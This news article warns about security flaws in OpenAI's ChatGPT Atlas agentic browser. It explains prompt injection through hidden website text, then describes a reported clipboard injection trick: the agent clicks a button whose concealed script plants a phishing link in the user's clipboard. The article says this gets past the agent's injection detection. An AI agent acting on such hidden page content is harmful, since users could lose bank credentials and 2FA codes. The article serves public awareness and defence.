ChatGPT’s AI Browser Has a Nasty Security Vulnerability

This week, OpenAI released ChatGPT Atlas, the company’s first AI web browser. Atlas lets you surf the web like any other browser, but, as you might expect, comes with ChatGPT integration. You can log into your account and tap into the assistant via the sidebar menu, which will remember not only past conversations, but your browsing history as well. Like other AI browsers—namely Perplexity Comet—the browser has an “agent mode,” which can take actions on your behalf. You can ask it to order you food through DoorDash or buy you plane tickets on Kayak instead of doing those things yourself.

While that might sound useful to ChatGPT fans, I had trouble recommending the browser to people, considering the security vulnerabilities AI browsers are currently facing. Any browser that has agentic features is vulnerable to prompt injection attacks: Bad actors can lace websites with hidden malicious prompts that the AI accepts as if they were written by the user. It might therefore take actions on behalf of the hacker, like opening a financial site or rooting through your email. Seems like a large risk just to outsource some basic internet tasks to an AI bot.

But prompt injections aren’t the only vulnerability Atlas currently faces. According to a new discovery, the browser may put the user’s clipboard at risk as well.

How Atlas’s clipboard injection vulnerability works

Android Authority spotted a post on X by the ethical hacker known as Pliny the Liberator. According to Pliny, ChatGPT Atlas is vulnerable to clipboard injection, a type of attack that allows a bad actor to access your computer’s clipboard. The idea is this: A bad actor can add a “copy to clipboard” feature to a button on their website. When you click the button, a malicious script runs in the background, which allows the bad actor to access your clipboard and add whatever they want to it. Maybe it’s a URL to a website designed to install malware on your devices; maybe it’s a URL to a site impersonating a financial site. Whatever the case, you don’t know your clipboard has been hacked, so you might open a new tab and paste what you think was the last thing you copied, falling into the trap.

The particular risk with ChatGPT Atlas is its agentic features: When in agent mode, Atlas might click a malicious button like this on its own, without you even knowing it. One moment, you’ve asked Atlas to order you lunch; the next moment, the browser accidentally set you up to be hacked.

Pliny says that OpenAI has evidently trained Atlas to recognize prompt injections, but the core “copy clipboard” function is hidden away from the AI’s sights. It’s a clever trick: The bot can hover over the button without knowing anything is wrong with it, so it “clicks” it without triggering any red flags.

For anyone that copies and pastes items frequently throughout the day, this could be quite dangerous. You might copy something in one app, then ask ChatGPT Atlas to do something on your behalf. But without knowing it, the browser clicks a malicious link that adds something to your clipboard. You then paste in your browser window, thinking you still have the original item copied, but you’re taken instead to a website that claims your banking session has expired, and you need to log in. If you’re multitasking quickly, you might “sign in” without thinking, handing over your bank credentials and 2FA codes without realizing it.

These are hypotheticals. At this time, there haven’t been documented cases of this type of malicious activity affecting ChatGPT Atlas. At the same time, ChatGPT Atlas is two days old. To me, the risk here doesn’t seem worth the execution—especially since I have no issue using the internet on my own.

Leave a Reply

Your email address will not be published. Required fields are marked *